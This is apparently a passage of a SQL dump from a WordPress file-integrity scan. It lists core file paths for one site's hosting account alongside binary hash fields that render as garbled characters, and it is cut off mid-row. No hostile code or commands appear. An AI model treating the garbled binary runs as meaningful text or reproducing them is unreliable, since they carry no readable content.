','',0,'?'),('~F㫎>dyj','wp-includes/css/jquery-ui-dialog-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/jquery-ui-dialog-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u+x)Av6@@','/Ne$2:.}b#K}','',0,'?'),('iPÙld\0','wp-includes/css/jquery-ui-dialog.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/jquery-ui-dialog.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bG-_fkqT','v48pnfZH\"ռ\\;jR&N','',0,'?'),('@V$K<1*','wp-includes/css/jquery-ui-dialog.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/jquery-ui-dialog.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S`7у-','j&ҰMu@6L}5{','',0,'?'),('\05g꫔c0\"D','wp-includes/css/media-views-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/media-views-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CoGcGAΊ8','\'^B kDO4-\'[m]=kl','',0,'?'),('_8}?','wp-includes/css/media-views-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/media-views-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ۰yux}p.q.A','K[t\Z(o[=s-\'`N','',0,'?'),('SڰpGMǯl','wp-includes/css/media-views.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/media-views.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F]xZfL','-(#Rk)nf8!%E!','',0,'?'),('4%IHOʰL','wp-includes/css/media-views.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/media-views.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zGs|W2M7Aѱ','H:5TԜrF\0g1W#c.q','',0,'?'),('Ǥ>zԄ!J]>','wp-includes/css/wp-auth-check-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/wp-auth-check-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','NPKNzjK','V','wp-includes/css/wp-pointer-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/wp-pointer-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','╄)y-?','&P\ne5o,V?A\ZU;9;z','',0,'?'),('jQe;e','wp-includes/css/wp-pointer-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/wp-pointer-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>\r@o4R','Hףm|oC4U\\;uP6u0\nl','',0,'?'),('sC4M**B)','wp-includes/css/wp-pointer.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/wp-pointer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',ԧ(0(y','Ij6ʄ{鈊\" Ԯi6ǭ','',0,'?'),('-藂Y{]ns','wp-includes/css/wp-pointer.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/css/wp-pointer.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kh:]w\\cUK','AMj%Uuք\"Zvl=(nH','',0,'?'),('xW2euvL','wp-includes/customize/class-wp-customize-background-image-control.php','/home/tummmyov/tummyrevolution.com/wp-includes/customize/class-wp-customize-background-image-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1SDM{KC(1','M\nK6e@zMd׽Z%d Xҁ','',0,'?'),('V^3m6._P','wp-includes/customize/class-wp-customize-background-image-setting.php','/home/tummmyov/tummyrevolution.com/wp-includes/customize/class-wp-customize-background-image-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#挷[^7,','lxE&35̅Nj!%Ƹv','',0,'?'),('D6S/cQ?','wp-includes/customize/class-wp-customize-background-position-control.php','/home/tummmyov/tummyrevolution.com/wp-includes/customize/class-wp-customize-background-position-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}4 O','\":\nD齨t>V7\nnՊ<;R','',0,'?'),('Y\0)\r/j)Ar','wp-includes/customize/class-wp-customize-filter-setting.php','/home/tummmyov/tummyrevolution.com/wp-includes/customize/class-wp-customize-filter-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M`f\0iu','\0<\nj:YFdw ','',0,'?'),('Zx12KZ,','wp-includes/customize/class-wp-customize-header-image-control.php','/home/tummmyov/tummyrevolution.com/wp-includes/customize/class-wp-customize-header-image-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0\rH=#b(rE','y^DEaz-O96^ $FJ','',0,'?'),('\'Kzf','wp-includes/customize/class-wp-customize-header-image-setting.php','/home/tummmyov/tummyrevolution.com/wp-includes/customize/class-wp-customize-header-image-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$,V9cRd6','dVn*m![IdǺa m','',0,'?'),('>“\n5Z','wp-includes/customize/class-wp-customize-image-control.php','/home/tummmyov/tummyrevolution.com/wp-includes/customize/class-wp-customize-image-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jf ˥^К','\nu8\rYY:\nVk.aGGoM','',0,'?'),(' *Oi','wp-includes/customize/class-wp-customize-media-control.php','/home/tummmyov/tummyrevolution.com/wp-includes/customize/class-wp-customize-media-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?!Bm\\-j','uEr<neF鞶g$<V','',0,'?'),('hS:`','wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php','/home/tummmyov/tummyrevolution.com/wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N+C#+|fZ]','kn\Zy&_[ Igl(g\'^G','',0,'?'),('3ƹܕjbiΥ','wp-includes/customize/class-wp-customize-nav-menu-control.php','/home/tummmyov/tummyrevolution.com/wp-includes/customize/class-wp-customize-nav-menu-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>3׆ꕰC\"','ato9 _}Bt5QfR5','',0,'?'),('CؚTR!vF{','wp-includes/customize/class-wp-customize-nav-menu-item-control.php','/home/tummmyov/tummyrevolution.com/wp-includes/customize/class-wp-customize-nav-menu-item-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9rYQh','N盀\n6uC5i ^ŗȝޑ\'','',0,'?'),('{ \n|p٤','wp-includes/customize/class-wp-customize-nav-menu-item-setting.php','/home/tummmyov/tummyrevolution.com/wp-includes/customize/class-wp-customize-nav-menu-item-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H\n\"!| W','>k/MŤU\"JPDH','\ZzM)C,\'0L} !','',0,'?'),('VL67G^l%D5z3','wp-includes/default-widgets.php','/home/tummmyov/tummyrevolution.com/wp-includes/default-widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' B z\\f\0','%rN8*G#CUᴭPzp_-\n֌','',0,'?'),('p.а[ÍD','wp-includes/deprecated.php','/home/tummmyov/tummyrevolution.com/wp-includes/deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VU~$','kQ6A*s-(9 g9>E4SY','',0,'?'),(')]Z$P%','wp-includes/embed-template.php','/home/tummmyov/tummyrevolution.com/wp-includes/embed-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ceVbӻ5=','Fn<7[zON\ZpE3@rB0','',0,'?'),('9ekkRoS','wp-includes/embed.php','/home/tummmyov/tummyrevolution.com/wp-includes/embed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1=*[ՠ',':z>ݴAБgh#PZ@','',0,'?'),('&MXWO','wp-includes/error-protection.php','/home/tummmyov/tummyrevolution.com/wp-includes/error-protection.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@GX=\">7Ś',',끭@cZ/_,<Җk','',0,'?'),('\"b9e|_','wp-includes/feed-atom-comments.php','/home/tummmyov/tummyrevolution.com/wp-includes/feed-atom-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Shx>sn*',', )IK2','wp-includes/feed-atom.php','/home/tummmyov/tummyrevolution.com/wp-includes/feed-atom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K:0wʏ','>gH:׎L3?w=','',0,'?'),('ȼ؟\'\r`','wp-includes/feed-rdf.php','/home/tummmyov/tummyrevolution.com/wp-includes/feed-rdf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xG7%\0b','p=m=GlhnhV]-+1a','',0,'?'),(']) {?R}','wp-includes/feed-rss.php','/home/tummmyov/tummyrevolution.com/wp-includes/feed-rss.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iJ?YC>^f','flPf52tY3xDׄ','',0,'?'),(' ߲;0 ','wp-includes/feed-rss2-comments.php','/home/tummmyov/tummyrevolution.com/wp-includes/feed-rss2-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','71uKAr I','2գ#;^Ħ  D2f5||5L','',0,'?'),('_*⽞L0>\r','wp-includes/feed-rss2.php','/home/tummmyov/tummyrevolution.com/wp-includes/feed-rss2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lN+5 O?','@!`C*Mezj@ @Ljw','',0,'?'),('{RC\Z.*\"Q','wp-includes/feed.php','/home/tummmyov/tummyrevolution.com/wp-includes/feed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e$Ha#k','7Np v1$E O ˾\0sv%','',0,'?'),('XC I%?ː','wp-includes/fonts/class-wp-font-face-resolver.php','/home/tummmyov/tummyrevolution.com/wp-includes/fonts/class-wp-font-face-resolver.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','84*|w]ǿ','{IDLLq+/jV','',0,'?'),('QqPOQJ','wp-includes/fonts/class-wp-font-face.php','/home/tummmyov/tummyrevolution.com/wp-includes/fonts/class-wp-font-face.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8d\rPS~9\08','pfJF}⇘Nr:0τ/','',0,'?'),('\Z5o#R\'/l','wp-includes/fonts/dashicons.eot','/home/tummmyov/tummyrevolution.com/wp-includes/fonts/dashicons.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N\Z>w@R-/Y','B\nZ\Z_pn͂Q?/\r3s})','',0,'?'),('΢S˪\nBV\"','wp-includes/fonts/dashicons.svg','/home/tummmyov/tummyrevolution.com/wp-includes/fonts/dashicons.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_3$_n5X',';ʐ\'84aOoY8-U62Kqq$Bx','',0,'?'),('ZfovW~,=','',0,'?'),('f0 ͭ~)','wp-includes/fonts/dashicons.woff','/home/tummmyov/tummyrevolution.com/wp-includes/fonts/dashicons.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' \Z_rY+ʂ;','yU]f8tlL.','',0,'?'),('L+qV;hY','wp-includes/fonts/dashicons.woff2','/home/tummmyov/tummyrevolution.com/wp-includes/fonts/dashicons.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','MN:\'ʤȹ','J !XLl` eOsH','',0,'?'),('TEaMYZ4CDi','wp-includes/fonts.php','/home/tummmyov/tummyrevolution.com/wp-includes/fonts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DXǬ/','vN |J^BE\0\\}8&l','',0,'?'),('ʼn i/Э','wp-includes/formatting.php','/home/tummmyov/tummyrevolution.com/wp-includes/formatting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8=E?5VbC','683\r/b^QWSL&0o','',0,'?'),('\Z)qtsCI9','wp-includes/functions.php','/home/tummmyov/tummyrevolution.com/wp-includes/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[Ma@60ڬz:','/E/4uչVJ5\"jc\r','',0,'?'),('b`K\'컜K','wp-includes/functions.wp-scripts.php','/home/tummmyov/tummyrevolution.com/wp-includes/functions.wp-scripts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j~Ei3;','+N=2烗9lnfa)\n','',0,'?'),('h d껅2_r','wp-includes/functions.wp-styles.php','/home/tummmyov/tummyrevolution.com/wp-includes/functions.wp-styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kl(>D<>~Ɨ','p ЮU j^*(aެ0@t\\nI\r4_','',0,'?'),('0RJ{yˣ','wp-includes/general-template.php','/home/tummmyov/tummyrevolution.com/wp-includes/general-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H8QH9','E9\Z01S/y!`]VS&f','',0,'?'),('uҫ;^\'B*','wp-includes/global-styles-and-settings.php','/home/tummmyov/tummyrevolution.com/wp-includes/global-styles-and-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ǣ;aC7K','X oeWbE\nX8pZ9!O {#','',0,'?'),('=Zzq2(','wp-includes/html-api/class-wp-html-active-formatting-elements.php','/home/tummmyov/tummyrevolution.com/wp-includes/html-api/class-wp-html-active-formatting-elements.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' _E<L;OPA2I؟','gL\"ND?մ P].Xk','',0,'?'),('8VݨJ*kD\r','wp-includes/html-api/class-wp-html-attribute-token.php','/home/tummmyov/tummyrevolution.com/wp-includes/html-api/class-wp-html-attribute-token.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DKDK8ZMv','(y>҉ iF~wvv$ -MS)','',0,'?'),('vzG٧g','wp-includes/html-api/class-wp-html-open-elements.php','/home/tummmyov/tummyrevolution.com/wp-includes/html-api/class-wp-html-open-elements.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}_LzX,','vX~F/.yװ4wi?p:f d','',0,'?'),('W) (v/31','wp-includes/html-api/class-wp-html-processor-state.php','/home/tummmyov/tummyrevolution.com/wp-includes/html-api/class-wp-html-processor-state.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Aqܛg','r|=At&q@$O.}ЭM׽E','',0,'?'),('3@]ɌҬhFZe\Zp{','CXd5[6vZR}Y','',0,'?'),('51Q?_','wp-includes/https-migration.php','/home/tummmyov/tummyrevolution.com/wp-includes/https-migration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bd^qn̠+','P~98Y*2*jiŭ','',0,'?'),('.IhU3+B\Z','wp-includes/images/admin-bar-sprite-2x.png','/home/tummmyov/tummyrevolution.com/wp-includes/images/admin-bar-sprite-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q 8o','*ETsal^pXZ\0','',0,'?'),('Ư \'CԻګ\Z','wp-includes/images/admin-bar-sprite.png','/home/tummmyov/tummyrevolution.com/wp-includes/images/admin-bar-sprite.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S:W^','rN!`VOcKviՀ{Fn\Zle','',0,'?'),('r_/HG=%<','wp-includes/images/arrow-pointer-blue-2x.png','/home/tummmyov/tummyrevolution.com/wp-includes/images/arrow-pointer-blue-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%mrތ]49c','{&DOzAf/gáA]~(','',0,'?'),('@̘9#Ly( ','wp-includes/images/arrow-pointer-blue.png','/home/tummmyov/tummyrevolution.com/wp-includes/images/arrow-pointer-blue.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wb·*L[','fbZD1.Vaw4l?pG^{','',0,'?'),('G5@07','wp-includes/images/blank.gif','/home/tummmyov/tummyrevolution.com/wp-includes/images/blank.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʟghkKf','>EGL EJQ|Bij','',0,'?'),('>M8 ٵ|','wp-includes/images/crystal/archive.png','/home/tummmyov/tummyrevolution.com/wp-includes/images/crystal/archive.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SI0An','L%XO+Aa!S\\܉&','',0,'?'),('J\'#rN0a\r','wp-includes/images/crystal/audio.png','/home/tummmyov/tummyrevolution.com/wp-includes/images/crystal/audio.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nV:ωG-#k','~B\Z-׼of|Wx\\|M)ˢ','',0,'?'),('wL0]r.','wp-includes/images/crystal/code.png','/home/tummmyov/tummyrevolution.com/wp-includes/images/crystal/code.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`119',';67\r!x\Z_@H&C-','',0,'?'),('!ެ߳ p','wp-includes/images/crystal/default.png','/home/tummmyov/tummyrevolution.com/wp-includes/images/crystal/default.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A>)*/!-','n$_u $Q3 E׏r|Jm','',0,'?'),('D m\nzHS','wp-includes/images/crystal/document.png','/home/tummmyov/tummyrevolution.com/wp-includes/images/crystal/document.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'^csD3T\\','g t( Ŏk`5͒JM5:j','',0,'?'),('j5F+o','wp-includes/images/crystal/interactive.png','/home/tummmyov/tummyrevolution.com/wp-includes/images/crystal/interactive.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Rm``9','$멘j','',0,'?'),('Z r!ޏf ','wp-includes/images/icon-pointer-flag.png','/home/tummmyov/tummyrevolution.com/wp-includes/images/icon-pointer-flag.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',E^j`\'','oq9a{)h}=#Tק','',0,'?'),('Y,eAw`','wp-includes/images/media/archive.png','/home/tummmyov/tummyrevolution.com/wp-includes/images/media/archive.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9h\0ìu','\0Bb3\'\')JG ](G9Pr2 s','',0,'?'),(':ṇRMti#=','wp-includes/images/media/audio.png','/home/tummmyov/tummyrevolution.com/wp-includes/images/media/audio.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','taCA.Z','L>$\noixo j-\nL]G;q ','',0,'?'),('3\" (za48','wp-includes/images/media/code.png','/home/tummmyov/tummyrevolution.com/wp-includes/images/media/code.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-o UʓUU_','\'eM a[R#q2kz+*<7\0j','',0,'?'),('(?>SN揚&','wp-includes/images/media/default.png','/home/tummmyov/tummyrevolution.com/wp-includes/images/media/default.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-IBh@b',':oLJDj$->i\'6n֠Ui','',0,'?'),('/<ا^ɼf}\"$','wp-includes/images/media/document.png','/home/tummmyov/tummyrevolution.com/wp-includes/images/media/document.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v48Αy6d','ø`f I$ _ZX\"0\r,','',0,'?'),('rYSxwDY˚J[','wp-includes/images/media/interactive.png','/home/tummmyov/tummyrevolution.com/wp-includes/images/media/interactive.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R׬˂ôʼnhH','{ [K\0!긽/\\lw.','',0,'?'),(' HVեdpVp','wp-includes/images/media/spreadsheet.png','/home/tummmyov/tummyrevolution.com/wp-includes/images/media/spreadsheet.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4\0Ṫ?',' v)\n6Zl2В1!+ ','',0,'?'),('9s3SZ,p8g','wp-includes/images/media/text.png','/home/tummmyov/tummyrevolution.com/wp-includes/images/media/text.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zs0ȝQK','g?[D*p8qVѓ>N','',0,'?'),('\n%f[!aErtgi','wp-includes/images/media/video.png','/home/tummmyov/tummyrevolution.com/wp-includes/images/media/video.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uhq','DBUMiOb,e=W{','',0,'?'),('k/y&G','wp-includes/images/rss-2x.png','/home/tummmyov/tummyrevolution.com/wp-includes/images/rss-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ya[Qrj','yS0c`\n7as#n Y','',0,'?'),('r؁=Ԓ','wp-includes/images/rss.png','/home/tummmyov/tummyrevolution.com/wp-includes/images/rss.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[(.*NZ','j(-9_E-#we$]o01u','',0,'?'),('{\r -}^','wp-includes/images/smilies/frownie.png','/home/tummmyov/tummyrevolution.com/wp-includes/images/smilies/frownie.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q ','r~Dzoh߱ػ\">E+Ke','',0,'?'),('Т펹|@','wp-includes/images/smilies/icon_arrow.gif','/home/tummmyov/tummyrevolution.com/wp-includes/images/smilies/icon_arrow.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' Jz','Q|x>@VЛ_/\"W%S','',0,'?'),('JBGT;,lT','wp-includes/images/smilies/icon_exclaim.gif','/home/tummmyov/tummyrevolution.com/wp-includes/images/smilies/icon_exclaim.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':\\>5\0rsg','LɵHA(xʓ2EP% ##5','',0,'?'),('\"u@TS5','wp-includes/images/smilies/icon_idea.gif','/home/tummmyov/tummyrevolution.com/wp-includes/images/smilies/icon_idea.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<]W3tށ','{2^4STlIJQ\"','',0,'?'),(' n$q^qf','wp-includes/images/smilies/icon_lol.gif','/home/tummmyov/tummyrevolution.com/wp-includes/images/smilies/icon_lol.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n:ѷ&(','l1Hq.2x󢾉$Y\Z8','',0,'?'),('(הWh@=a','wp-includes/images/smilies/icon_mad.gif','/home/tummmyov/tummyrevolution.com/wp-includes/images/smilies/icon_mad.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V! @c0S','d[O:LJjl}q','',0,'?'),('\ZUEs(#Ep','wp-includes/images/smilies/icon_mrgreen.gif','/home/tummmyov/tummyrevolution.com/wp-includes/images/smilies/icon_mrgreen.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$_uX|I%~$','!BI1mV-|јX5D8h','',0,'?'),('ki.\\','wp-includes/images/smilies/icon_neutral.gif','/home/tummmyov/tummyrevolution.com/wp-includes/images/smilies/icon_neutral.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VM3HU1!v',' Oi s8\0|z 6]e@Ym49','',0,'?'),('7M3š$','wp-includes/images/smilies/icon_question.gif','/home/tummmyov/tummyrevolution.com/wp-includes/images/smilies/icon_question.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[-\0\'WF','7b|6#9/?x~ [%t','',0,'?'),(':[&b[hY','wp-includes/images/smilies/icon_razz.gif','/home/tummmyov/tummyrevolution.com/wp-includes/images/smilies/icon_razz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9[wDAMA',';P1]fUE;`Qڮ\neZ\0@4aA','',0,'?'),('$0S\rr','wp-includes/images/smilies/icon_redface.gif','/home/tummmyov/tummyrevolution.com/wp-includes/images/smilies/icon_redface.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','UE','>DC9McJ\Z+UL1f+g','',0,'?'),('B]nȄ87g','wp-includes/images/smilies/icon_rolleyes.gif','/home/tummmyov/tummyrevolution.com/wp-includes/images/smilies/icon_rolleyes.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_56IĔE','b;SG`JL4;ͮ1;\\;xl','',0,'?'),('HPw%8','wp-includes/images/smilies/icon_sad.gif','/home/tummmyov/tummyrevolution.com/wp-includes/images/smilies/icon_sad.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IxoTMzD-','b5yh9}o WInn','',0,'?'),('e97aJS','wp-includes/images/smilies/icon_smile.gif','/home/tummmyov/tummyrevolution.com/wp-includes/images/smilies/icon_smile.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3.)2p','ˠ\",RʨTr=orЗ:','',0,'?'),(';Wct*+Br','wp-includes/images/smilies/icon_surprised.gif','/home/tummmyov/tummyrevolution.com/wp-includes/images/smilies/icon_surprised.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U-#+0?','cuyXؓAd5[=w>*Spwe._','',0,'?'),('\\:ڈ)g,\\','wp-includes/images/smilies/icon_twisted.gif','/home/tummmyov/tummyrevolution.com/wp-includes/images/smilies/icon_twisted.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Lv[?+*8;','VHhK\np;.&/E','',0,'?'),('8P5aĨ ','wp-includes/images/smilies/icon_wink.gif','/home/tummmyov/tummyrevolution.com/wp-includes/images/smilies/icon_wink.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e?2i','(V{VBko(`ZV 6','',0,'?'),('g|y_o4\"XN','wp-includes/images/smilies/mrgreen.png','/home/tummmyov/tummyrevolution.com/wp-includes/images/smilies/mrgreen.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-5^Jj','Mg$+;\05H&\\E6%w','',0,'?'),('{Y\\z錿}c','wp-includes/images/smilies/rolleyes.png','/home/tummmyov/tummyrevolution.com/wp-includes/images/smilies/rolleyes.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' O2Ofݣi','fK)\nd!]\r)\\}זl^','',0,'?'),('ջZml4ˮU','wp-includes/images/smilies/simple-smile.png','/home/tummmyov/tummyrevolution.com/wp-includes/images/smilies/simple-smile.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K{…fwh','?Yag\\6QW4ڠR','',0,'?'),('_43=','wp-includes/images/uploader-icons.png','/home/tummmyov/tummyrevolution.com/wp-includes/images/uploader-icons.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\M m','p+/i!Zţ6m','',0,'?'),('\0)4\nTYd4G~','wp-includes/images/w-logo-blue-white-bg.png','/home/tummmyov/tummyrevolution.com/wp-includes/images/w-logo-blue-white-bg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0 Ȉk|Ѽ','OɗoCA/x<%4=?','',0,'?'),('x9@^6ߑo','wp-includes/images/w-logo-blue.png','/home/tummmyov/tummyrevolution.com/wp-includes/images/w-logo-blue.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[NW_pw0','ޣ^Qt3HunU❻~\'T2','',0,'?'),(' ~U\"&','wp-includes/images/wpicons-2x.png','/home/tummmyov/tummyrevolution.com/wp-includes/images/wpicons-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nVo$Of~7',']کA=ђ%q%aMBUp','',0,'?'),('g$G\\;r1X','wp-includes/images/wpicons.png','/home/tummmyov/tummyrevolution.com/wp-includes/images/wpicons.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dSuqV_a','cZ_?n_K61\\}r','',0,'?'),('\rEǗ','wp-includes/images/wpspin-2x.gif','/home/tummmyov/tummyrevolution.com/wp-includes/images/wpspin-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mSy\"C','66SX6O}4>p\"\'1','',0,'?'),('Rx4Mp@9u\n֊ p','wp-includes/images/wpspin.gif','/home/tummmyov/tummyrevolution.com/wp-includes/images/wpspin.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hkuR\r@9k ','!Fױ(#1:','',0,'?'),('N\\|`*,)@4','wp-includes/images/xit-2x.gif','/home/tummmyov/tummyrevolution.com/wp-includes/images/xit-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ӂu:@4\rz<5','S\r}@~Q:Sc*d+Z_{R','',0,'?'),('\n\\ɶ.5','wp-includes/images/xit.gif','/home/tummmyov/tummyrevolution.com/wp-includes/images/xit.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 3Xī9+6n~',' sۨ S,md\\YbƇo','',0,'?'),('HrEP ','wp-includes/index.htm','/home/tummmyov/tummyrevolution.com/wp-includes/index.htm',0,'ُ\0 B~','ُ\0 B~','Bșo$\'AdLxRU','',0,'?'),('Ge 2=A&5bM *','wp-includes/index.html','/home/tummmyov/tummyrevolution.com/wp-includes/index.html',0,'ُ\0 B~','ُ\0 B~','Bșo$\'AdLxRU','',0,'?'),('~) RÒlSk=','wp-includes/index.php','/home/tummmyov/tummyrevolution.com/wp-includes/index.php',0,'ُ\0 B~','ُ\0 